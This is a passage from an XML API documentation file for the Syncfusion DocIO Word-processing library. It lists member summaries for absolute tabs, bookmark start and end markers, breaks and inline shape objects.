        <member name="M:Syncfusion.DocIO.DLS.WAbsoluteTab.#ctor(Syncfusion.DocIO.DLS.IWordDocument)">
            <summary>
            Initializes a new instance of the <see cref="T:Syncfusion.DocIO.DLS.WAbsoluteTab"/> class.
            </summary>
            <param name="doc">Document</param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.WAbsoluteTab.GetTabPostion">
            <summary>
            Get the tab position.
            </summary>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.WAbsoluteTab.GetTabPostionRelativeToMargin">
            <summary>
            Get the tab position relative to margin.
            </summary>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.WAbsoluteTab.GetTabPostionRelativeToIndent">
            <summary>
            Get the tab position relative to indent.
            </summary>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.WAbsoluteTab.GetBaseEntity(Syncfusion.DocIO.DLS.Entity)">
            <summary>
            Get Base Entity
            </summary>
            <param name="ent"></param>
            <returns></returns>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.WAbsoluteTab.GetCellWidth(Syncfusion.DocIO.DLS.WTableCell)">
            <summary>
            Get cell width
            </summary>
            <param name="tableCell"></param>
            <returns>the cell width</returns>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.WAbsoluteTab.GetLeftPadding(Syncfusion.DocIO.DLS.WTableCell)">
            <summary>
            Get left padding of table cell
            </summary>
            <param name="tableCell"></param>
            <returns>the left padding</returns>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.WAbsoluteTab.GetRightPadding(Syncfusion.DocIO.DLS.WTableCell)">
            <summary>
            Get right padding of table cell
            </summary>
            <param name="tableCell"></param>
            <returns>the right padding</returns>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.WAbsoluteTab.AttachToParagraph(Syncfusion.DocIO.DLS.WParagraph,System.Int32)">
            <summary>
            Attaches to paragraph.
            </summary>
            <param name="paragraph">The paragraph.</param>
            <param name="itemPos">The item pos.</param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.WAbsoluteTab.Detach">
            <summary>
            Detaches from owner.
            </summary>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.WAbsoluteTab.WriteXmlAttributes(Syncfusion.DocIO.DLS.XML.IXDLSAttributeWriter)">
            <summary>
            Writes object data as xml attributes.
            </summary>
            <param name="writer">The <see cref="T:Syncfusion.DocIO.DLS.XML.IXDLSAttributeWriter"/> object.</param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.WAbsoluteTab.ReadXmlAttributes(Syncfusion.DocIO.DLS.XML.IXDLSAttributeReader)">
            <summary>
            Reads object data from xml attributes.
            </summary>
            <param name="reader">The <see cref="T:Syncfusion.DocIO.DLS.XML.IXDLSAttributeReader"/> object.</param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.WAbsoluteTab.InitXDLSHolder">
            <summary>
            Registers child objects in XDSL holder.
            </summary>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.WAbsoluteTab.Close">
            <summary>
            Closes this instance.
            </summary>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.WAbsoluteTab.CreateLayoutInfo">
            <summary>
            Create LayoutInfo
            </summary>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.WAbsoluteTab.Syncfusion#Layouting#ILeafWidget#Measure(Syncfusion.DocIO.Rendering.DrawingContext)">
            <summary>
            Measures self size.
            </summary>
            <param name="graphics"></param>
            <returns></returns>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.WAbsoluteTab.GetLayoutTabPostion">
            <summary>
            Get Absolute Tab position to layout in Doc to PDF conversion
            </summary>
            <returns></returns>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.WAbsoluteTab.Syncfusion#Layouting#IWidget#InitLayoutInfo">
            <summary>
            Initializing LayoutInfo value to null
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.WAbsoluteTab.Text">
            <summary>
            Gets/sets Character format.
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.WAbsoluteTab.Position">
            <summary>
            Gets the Absolute Tab position.
            </summary>
            <value>The Absolute Tab position.</value>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.WAbsoluteTab.EntityType">
            <summary>
            Gets the type of the entity.
            </summary>
            <value>The <see cref="T:Syncfusion.DocIO.DLS.EntityType"/> of the current item.</value>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.WAbsoluteTab.Alignment">
            <summary>
            Gets or Sets the Absolute Tab alignment.
            </summary>
            <value>The Absolute Tab alignment.</value>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.WAbsoluteTab.Relation">
            <summary>
            Gets or Sets the Absolute Tab relation.
            </summary>
            <value>The Absolute Tab relation.</value>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.WAbsoluteTab.TabLeader">
            <summary>
            Gets or Sets the Absolute Tab Leader.
            </summary>
            <value>The Absolute Tab Leader.</value>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.WAbsoluteTab.CharacterFormat">
            <summary>
            Gets/sets Character format.
            </summary>
        </member>
        <member name="T:Syncfusion.DocIO.DLS.BookmarkEnd">
            <summary>
            Represents the end position of the <see cref="T:Syncfusion.DocIO.DLS.Bookmark"/>
            in the document.
            </summary>
            <seealso cref="T:Syncfusion.DocIO.DLS.Bookmark"/>
            <seealso cref="T:Syncfusion.DocIO.DLS.BookmarkCollection"/>
            <seealso cref="T:Syncfusion.DocIO.DLS.BookmarksNavigator"/>
            <seealso cref="T:Syncfusion.DocIO.DLS.BookmarkStart"/>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.BookmarkEnd.#ctor(Syncfusion.DocIO.DLS.WordDocument)">
            <summary>
            Initializes a new instance of the <see cref="T:Syncfusion.DocIO.DLS.BookmarkEnd"/> class.
            </summary>
            <param name="doc">The doc.</param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.BookmarkEnd.#ctor(Syncfusion.DocIO.DLS.IWordDocument,System.String)">
            <summary>
            Initializes a new instance of the <see cref="T:Syncfusion.DocIO.DLS.BookmarkEnd"/> class with the specified 
            <see cref="T:Syncfusion.DocIO.DLS.WordDocument"/> and <see cref="T:Syncfusion.DocIO.DLS.Bookmark"/> name.
            </summary>
            <param name="document">The <see cref="T:Syncfusion.DocIO.DLS.WordDocument"/> object.</param>
            <param name="name">The <b>string</b> that represents the <see cref="T:Syncfusion.DocIO.DLS.Bookmark"/> name.</param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.BookmarkEnd.Close">
            <summary>
            Closes the item.
            </summary>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.BookmarkEnd.SetName(System.String)">
            <summary>
            Sets the name.
            </summary>
            <param name="name">The name.</param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.BookmarkEnd.AttachToParagraph(Syncfusion.DocIO.DLS.WParagraph,System.Int32)">
            <summary>
            Attaches to paragraph.
            </summary>
            <param name="owner"></param>
            <param name="itemPos"></param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.BookmarkEnd.Detach">
            <summary>
            Detaches from owner.
            </summary>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.BookmarkEnd.AttachToDocument">
            <summary>
            
            </summary>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.BookmarkEnd.CloneImpl">
            <summary>
            Creates a duplicate copy of the entity.
            <exclude/>
            </summary>
            <returns>An object that is newly created.</returns>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.BookmarkEnd.WriteXmlAttributes(Syncfusion.DocIO.DLS.XML.IXDLSAttributeWriter)">
            <summary>
            Writes object data as xml attributes.
            <exclude/>
            </summary>
            <param name="writer">The <see cref="T:Syncfusion.DocIO.DLS.XML.IXDLSAttributeWriter"/> object.</param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.BookmarkEnd.ReadXmlAttributes(Syncfusion.DocIO.DLS.XML.IXDLSAttributeReader)">
            <summary>
            Reads object data from xml attributes.
            <exclude/>
            </summary>
            <param name="reader">The <see cref="T:Syncfusion.DocIO.DLS.XML.IXDLSAttributeReader"/> object.</param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.BookmarkEnd.CreateLayoutInfo">
            <summary>
            Creates layout information.
            <exclude/>
            </summary>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.BookmarkEnd.Syncfusion#Layouting#ILeafWidget#Measure(Syncfusion.DocIO.Rendering.DrawingContext)">
            <summary>
            Measures the specified Custom Graphics.
            </summary>
            <param name="cg">The Custom Graphics.</param>
            <returns></returns>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.BookmarkEnd.EntityType">
            <summary>
            Gets the type of the entity.
            </summary>
            <value>The <see cref="T:Syncfusion.DocIO.DLS.EntityType"/> of the current item.</value>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.BookmarkEnd.Name">
            <summary>
            Gets the bookmark name.
            </summary>
            <value>The <b>string </b> that represents the bookmark end name in the document.</value>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.BookmarkEnd.IsCellGroupBkmk">
            <summary>
            Gets/sets IsCellGroupBkmk value.
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.BookmarkEnd.IsDetached">
            <summary>
            Specifies whether the Bookmark is detached (For both cases either cloned or removed from collection) from the Bookmarks collection.
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.BookmarkEnd.IsAfterParagraphMark">
            <summary>
            Get/Set if the bookmark end is preserved after the Paragraph mark
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.BookmarkEnd.IsAfterCellMark">
            <summary>
            Get/Set if the bookmark end is preserved after the TableCell mark
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.BookmarkEnd.IsAfterRowMark">
            <summary>
            Get/Set if the bookmark end is preserved after the TableRow mark
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.BookmarkEnd.IsAfterTableMark">
            <summary>
            Get/Set if the bookmark end is preserved after the Table mark
            </summary>
        </member>
        <member name="T:Syncfusion.DocIO.DLS.BookmarkStart">
            <summary>
            Represents the start position of the <see cref="T:Syncfusion.DocIO.DLS.Bookmark"/>
            in the document.
            </summary>
            <seealso cref="T:Syncfusion.DocIO.DLS.Bookmark"/>
            <seealso cref="T:Syncfusion.DocIO.DLS.BookmarkCollection"/>
            <seealso cref="T:Syncfusion.DocIO.DLS.BookmarkEnd"/>
            <seealso cref="T:Syncfusion.DocIO.DLS.BookmarksNavigator"/>
        </member>
        <member name="F:Syncfusion.DocIO.DLS.BookmarkStart.m_strName">
            <summary>
            
            </summary>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.BookmarkStart.#ctor(Syncfusion.DocIO.DLS.WordDocument)">
            <summary>
            Initializes a new instance of the <see cref="T:Syncfusion.DocIO.DLS.BookmarkStart"/> class.
            </summary>
            <param name="doc">The doc.</param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.BookmarkStart.#ctor(Syncfusion.DocIO.DLS.IWordDocument,System.String)">
            <summary>
            Initializes a new instance of the <see cref="T:Syncfusion.DocIO.DLS.BookmarkStart"/> class with the specified 
            <see cref="T:Syncfusion.DocIO.DLS.WordDocument"/> and <see cref="T:Syncfusion.DocIO.DLS.Bookmark"/> name.
            </summary>
            <param name="doc">The <see cref="T:Syncfusion.DocIO.DLS.WordDocument"/> object.</param>
            <param name="name">The <b>string</b> that represents the <see cref="T:Syncfusion.DocIO.DLS.Bookmark"/> name.</param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.BookmarkStart.SetName(System.String)">
            <summary>
            Sets the bookmark name.
            </summary>
            <param name="name">The name.</param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.BookmarkStart.AttachToParagraph(Syncfusion.DocIO.DLS.WParagraph,System.Int32)">
            <summary>
            Attaches to paragraph.
            </summary>
            <param name="owner"></param>
            <param name="itemPos"></param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.BookmarkStart.Detach">
            <summary>
            Detaches from owner.
            </summary>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.BookmarkStart.AttachToDocument">
            <summary>
            Clones the relations.
            </summary>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.BookmarkStart.CloneImpl">
            <summary>
            Creates a duplicate copy of the entity.
            <exclude/>
            </summary>
            <returns>An object that is newly created.</returns>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.BookmarkStart.Close">
            <summary>
            Closes the item.
            </summary>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.BookmarkStart.GetBkmkContentInDiffCell(Syncfusion.DocIO.DLS.WTable,System.Int32,System.Int32,System.Int32,System.Int32,Syncfusion.DocIO.DLS.WTextBody)">
            <summary>
            Get the bookmark content in different cells in a single table
            </summary>
            <param name="bkmkTable">Bookmark start or bookmark end owner table</param>
            <param name="startTableRowIndex">Bookmark start owner table row index</param>
            <param name="endTableRowIndex">Bookmark end owner table row index</param>
            <param name="startCellIndex">Bookmark start owner cell index</param>
            <param name="endCellIndex">Bookmark end owner cell index</param>
            <param name="textBody">Temporary textbody to store the textbody items</param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.BookmarkStart.RemoveBkmkStartEndFromCell(Syncfusion.DocIO.DLS.WTableCell)">
            <summary>
            Remove bookmark start and end from its owner cell when getting bookmatk content
            </summary>
            <param name="tableCell">Current table cell to check</param>
            <returns>The WTableCell</returns>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.BookmarkStart.GetBookmarkStartAndEndCell(Syncfusion.DocIO.DLS.WTableCell,Syncfusion.DocIO.DLS.WTableCell,Syncfusion.DocIO.DLS.WTableCell,Syncfusion.DocIO.DLS.WTable,Syncfusion.DocIO.DLS.WTable,Syncfusion.DocIO.DLS.BookmarkStart,Syncfusion.DocIO.DLS.BookmarkEnd,System.Int32,System.Int32@,System.Int32@,System.Int32@)">
            <summary>
            Get the exact bookmark start and bookmark end cell
            </summary>
            <param name="bkmkStartCell">Current bookmark start owner cell</param>
            <param name="bkmkEndCell">Current bookmark end owner cell</param>
            <param name="tempBkmkEndCell">Temporary bookmark end cell</param>
            <param name="bkmkStartTable">Bookmark start owner table</param>
            <param name="bkmkEndTable">Bookmark end owner table</param>
            <param name="bkmkStart">Current bookmark start</param>
            <param name="bkmkEnd">Current bookmark end</param>
            <param name="startTableRowIndex">Bookmark start owner row index</param>
            <param name="endTableRowIndex">Bookmark end owner row index</param>
            <param name="bkmkStartCellIndex">Bookmark start owner cell index</param>
            <param name="bkmkEndCellIndex">Bookmark end owner cell index</param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.BookmarkStart.WriteXmlAttributes(Syncfusion.DocIO.DLS.XML.IXDLSAttributeWriter)">
            <summary>
            Writes object data as xml attributes.
            <exclude/>
            </summary>
            <param name="writer">The <see cref="T:Syncfusion.DocIO.DLS.XML.IXDLSAttributeWriter"/> object.</param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.BookmarkStart.ReadXmlAttributes(Syncfusion.DocIO.DLS.XML.IXDLSAttributeReader)">
            <summary>
            Reads object data from xml attributes.
            <exclude/>
            </summary>
            <param name="reader">The <see cref="T:Syncfusion.DocIO.DLS.XML.IXDLSAttributeReader"/> object.</param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.BookmarkStart.CreateLayoutInfo">
            <summary>
            Creates layout information.
            <exclude/>
            </summary>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.BookmarkStart.Syncfusion#Layouting#ILeafWidget#Measure(Syncfusion.DocIO.Rendering.DrawingContext)">
            <summary>
            
            </summary>
            <param name="cg"></param>
            <returns></returns>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.BookmarkStart.Syncfusion#Layouting#IWidget#InitLayoutInfo">
            <summary>
            Initializing LayoutInfo value to null
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.BookmarkStart.EntityType">
            <summary>
            Gets the type of the entity.
            </summary>
            <value>The <see cref="T:Syncfusion.DocIO.DLS.EntityType"/> of the current item.</value>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.BookmarkStart.Name">
            <summary>
            Gets the name of bookmark start.
            </summary>
            <value>The <b>string</b> that represents the name of bookmark start.</value>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.BookmarkStart.IsCellGroupBkmk">
            <summary>
            Gets or sets IsCellGroupBkmk value.
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.BookmarkStart.IsDetached">
            <summary>
            Specifies whether the Bookmark is detached (For both cases either cloned or removed from collection) from the Bookmarks collection.
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.BookmarkStart.ColumnFirst">
            <summary>
            Gets or sets the index of the column where bookmark starts.
            </summary>
            <value>The column first.</value>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.BookmarkStart.ColumnLast">
            <summary>
            Gets or sets the index of the column where bookmarks ends.
            </summary>
            <value>The column last.</value>
        </member>
        <member name="T:Syncfusion.DocIO.DLS.Break">
            <summary>
            Represents breaks in the paragraph, can be a page break, column break or line break.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.DLS.Break.m_breakType">
            <summary>
            Type of break. 
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.DLS.Break.m_lineBreakText">
            <summary>
            Line break text.
            </summary>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.Break.#ctor(Syncfusion.DocIO.DLS.IWordDocument)">
            <summary>
            Initializes a new instance of the <see cref="T:Syncfusion.DocIO.DLS.Break"/> class.
            </summary>
            <param name="doc">The <see cref="T:Syncfusion.DocIO.DLS.WordDocument"/> object.</param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.Break.#ctor(Syncfusion.DocIO.DLS.IWordDocument,Syncfusion.DocIO.DLS.BreakType)">
            <summary>
            Initializes a new instance of the <see cref="T:Syncfusion.DocIO.DLS.Break"/> class.
            </summary>
            <param name="doc">The <see cref="T:Syncfusion.DocIO.DLS.WordDocument"/> object.</param>
            <param name="breakType">The <see cref="T:Syncfusion.DocIO.DLS.BreakType"/> member that specifies the break type.</param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.Break.Close">
            <summary>
            Closes the item.
            </summary>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.Break.CloneImpl">
            <summary>
            Clones itself.
            <exclude/>
            </summary>
            <returns>An object that represents the cloned copy.</returns>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.Break.CloneRelationsTo(Syncfusion.DocIO.DLS.WordDocument,Syncfusion.DocIO.DLS.OwnerHolder)">
            <summary>
            Clones the relations.
            </summary>
            <param name="doc">The doc.</param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.Break.AttachToParagraph(Syncfusion.DocIO.DLS.WParagraph,System.Int32)">
            <summary>
            Attaches to paragraph.
            </summary>
            <param name="paragraph">The paragraph.</param>
            <param name="itemPos">The item pos.</param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.Break.Detach">
            <summary>
            Detaches from owner.
            </summary>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.Break.WriteXmlAttributes(Syncfusion.DocIO.DLS.XML.IXDLSAttributeWriter)">
            <summary>
            Writes object data as xml attributes.
            <exclude/>
            </summary>
            <param name="writer">The <see cref="T:Syncfusion.DocIO.DLS.XML.IXDLSAttributeWriter"/> object.</param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.Break.ReadXmlAttributes(Syncfusion.DocIO.DLS.XML.IXDLSAttributeReader)">
            <summary>
            Reads object data from xml attributes.
            <exclude/>
            </summary>
            <param name="reader">The <see cref="T:Syncfusion.DocIO.DLS.XML.IXDLSAttributeReader"/> object.</param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.Break.InitXDLSHolder">
            <summary>
            Registers child objects in XDSL holder.
            <exclude/>
            </summary>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.Break.CreateLayoutInfo">
            <summary>
            Creates layout information.
            <exclude/>
            </summary>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.Break.Syncfusion#Layouting#ILeafWidget#Measure(Syncfusion.DocIO.Rendering.DrawingContext)">
            <summary>
            Measures self size.
            </summary>
            <param name="graphics"></param>
            <returns></returns>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.Break.HtmlToDocLayoutInfo">
            <summary>
            Gets Html to Doc layout info
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.Break.EntityType">
            <summary>
            Gets the type of the entity.
            </summary>
            <value>The <see cref="T:Syncfusion.DocIO.DLS.EntityType"/> of the current item.</value>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.Break.BreakType">
            <summary>
            Gets the type of the break.
            </summary>
            <value>The <see cref="T:Syncfusion.DocIO.DLS.BreakType"/> member that specifies the break type.</value>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.Break.TextRange">
            <summary>
            Gets/sets text range of line break.
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.Break.EndPos">
            <summary>
            Gets the end pos.
            </summary>
            <value>The end pos.</value>
        </member>
        <member name="T:Syncfusion.DocIO.DLS.InlineShapeObject">
            <summary>
            Represents the Inline Shape Object.
            </summary>
        </member>
        <member name="T:Syncfusion.DocIO.DLS.ShapeObject">
            <summary>
            Represents the shape object in the Word document.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.DLS.ShapeObject.m_fspa">
            <summary>
            
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.DLS.ShapeObject.m_textBoxColl">
            <summary>
            
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.DLS.ShapeObject.m_bFlags">
            <summary>
            
            </summary>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.ShapeObject.#ctor(Syncfusion.DocIO.DLS.IWordDocument)">
            <summary>
            
            </summary>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.ShapeObject.AddSelf">
            <summary>
            Adds the self.
            </summary>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.ShapeObject.AttachToParagraph(Syncfusion.DocIO.DLS.WParagraph,System.Int32)">
            <summary>
            Attaches to paragraph.
            </summary>
            <param name="owner"></param>
            <param name="itemPos"></param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.ShapeObject.CloneRelationsTo(Syncfusion.DocIO.DLS.WordDocument,Syncfusion.DocIO.DLS.OwnerHolder)">
            <summary>
            
            </summary>
            <param name="doc"></param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.ShapeObject.CloneImpl">
            <summary>
            Creates a duplicate copy of this <see cref="T:Syncfusion.DocIO.DLS.ShapeObject"/>.
            <exclude/>
            </summary>
            <returns>The reference of the newly created object.</returns>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.ShapeObject.CreateLayoutInfo">
            <summary>
            Creates the layout information.
            <exclude/>
            </summary>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.ShapeObject.WriteXmlAttributes(Syncfusion.DocIO.DLS.XML.IXDLSAttributeWriter)">
            <summary>
            Writes object data as xml attributes.
            <exclude/>
            </summary>
            <param name="writer">The <see cref="T:Syncfusion.DocIO.DLS.XML.IXDLSAttributeWriter"/> object.</param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.ShapeObject.ReadXmlAttributes(Syncfusion.DocIO.DLS.XML.IXDLSAttributeReader)">
            <summary>
            Reads object data from xml attributes.
            <exclude/>
            </summary>
            <param name="reader">The <see cref="T:Syncfusion.DocIO.DLS.XML.IXDLSAttributeReader"/> object.</param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.ShapeObject.InitXDLSHolder">
            <summary>
            Registers child objects in XDSL holder.
            <exclude/>
            </summary>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.ShapeObject.Close">
            <summary>
            Closes this instance.
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.ShapeObject.EntityType">
            <summary>
            Gets the type of the entity.
            </summary>
            <value>The <see cref="T:Syncfusion.DocIO.DLS.EntityType"/> of the current item.</value>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.ShapeObject.FSPA">
            <summary>
            Get/set FSPA for ShapeObject.
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.ShapeObject.AutoShapeTextCollection">
            <summary>
            Gets/sets ShapeObject's main autoshape collection.
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.ShapeObject.IsHeaderAutoShape">
            <summary>
            Get/set value which defines whenever current autoshape
            is in header/footer subdocument.
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.ShapeObject.AllowInCell">
            <summary>
            Gets or sets a value indicating whether the LayoutInCell property is set for the Shape in the Table cell.
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.ShapeObject.CharacterFormat">
            <summary>
            Gets shape object's character format.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.DLS.InlineShapeObject.m_inlinePictDesc">
            <summary>
            
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.DLS.InlineShapeObject.m_curBSE">
            <summary>
            
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.DLS.InlineShapeObject.m_shapeContainer">
            <summary>
            
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.DLS.InlineShapeObject.m_oleContainerId">
            <summary>
            Defines id of OLE container in obeject pool.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.DLS.InlineShapeObject.m_unparsedData">
            <summary>
            Unparsed data stream
            </summary>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.InlineShapeObject.#ctor(Syncfusion.DocIO.DLS.IWordDocument)">
            <summary>
            Initializes a new instance of the <see cref="T:Syncfusion.DocIO.DLS.InlineShapeObject"/> class with the specified <see cref="T:Syncfusion.DocIO.DLS.IWordDocument"/> instance.
            </summary>
            <param name="doc"></param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.InlineShapeObject.CloneImpl">
            <summary>
            Clones the current item.
            <exclude/>
            </summary>
            <returns>An object that is cloned copy of current item.</returns>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.InlineShapeObject.GetDashStyle(Syncfusion.DocIO.DLS.BorderStyle,Syncfusion.DocIO.DLS.TextBoxLineStyle@)">
            <summary>
            Gets the dash style.
            </summary>
            <param name="borderStyle">The border style.</param>
            <param name="lineStyle">The line style.</param>
            <returns></returns>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.InlineShapeObject.GetBorderStyle(Syncfusion.DocIO.LineDashing,Syncfusion.DocIO.DLS.TextBoxLineStyle)">
            <summary>
            Gets the border style.
            </summary>
            <param name="dashStyle">The dash style.</param>
            <param name="lineStyle">The line style.</param>
            <returns></returns>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.InlineShapeObject.ConvertToInlineShape">
            <summary>
            Converts to inline shape.
            </summary>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.InlineShapeObject.ConvertToShape">
            <summary>
            Converts to shape.
            </summary>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.InlineShapeObject.GetEffectExtent(System.Double,System.Int64@,System.Int64@)">
            <summary>
            Gets the effect extent.
            </summary>
            <param name="borderWidth">Width of the border.</param>
            <param name="leftTop">The left top.</param>
            <param name="rightBottom">The right bottom.</param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.InlineShapeObject.WriteXmlContent(Syncfusion.DocIO.DLS.XML.IXDLSContentWriter)">
            <summary>
            Writes object data as inside xml element.
            <exclude/>
            </summary>
            <param name="writer">The <see cref="T:Syncfusion.DocIO.DLS.XML.IXDLSContentWriter"/> object.</param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.InlineShapeObject.ReadXmlContent(Syncfusion.DocIO.DLS.XML.IXDLSContentReader)">
            <summary>
            Reads object data from xml attributes.
            <exclude/>
            </summary>
            <param name="reader">The <see cref="T:Syncfusion.DocIO.DLS.XML.IXDLSContentReader"/> object.</param>
            <returns>The value indicating the presence of xml content.</returns>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.InlineShapeObject.ReadXmlAttributes(Syncfusion.DocIO.DLS.XML.IXDLSAttributeReader)">
            <summary>
            Reads object data from xml attributes.
            <exclude/>
            </summary>
            <param name="reader">The <see cref="T:Syncfusion.DocIO.DLS.XML.IXDLSAttributeReader"/> object.</param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.InlineShapeObject.WriteXmlAttributes(Syncfusion.DocIO.DLS.XML.IXDLSAttributeWriter)">
            <summary>
            Writes object data as xml attributes.
            <exclude/>
            </summary>
            <param name="writer">The <see cref="T:Syncfusion.DocIO.DLS.XML.IXDLSAttributeWriter"/> object.</param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.InlineShapeObject.CloneRelationsTo(Syncfusion.DocIO.DLS.WordDocument,Syncfusion.DocIO.DLS.OwnerHolder)">
            <summary>
            </summary>
            <param name="doc"></param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.InlineShapeObject.Close">
            <summary>
            Closes this instance.
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.InlineShapeObject.LineGradient">
            <summary>
            Gets the line gradient.
            </summary>
            <value>The line gradient.</value>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.InlineShapeObject.PictureDescriptor">
            <summary>
            Gets/sets inline shape object's format.
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.InlineShapeObject.ShapeContainer">
            <summary>
            
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.InlineShapeObject.IsOLE">
            <summary>
            Gets/sets IsOLE property
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.InlineShapeObject.OLEContainerId">
            <summary>
            Get/set id for OLE container which has image data.
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.InlineShapeObject.UnparsedData">
            <summary>
            Get unparsed data stream
            </summary>
        </member>
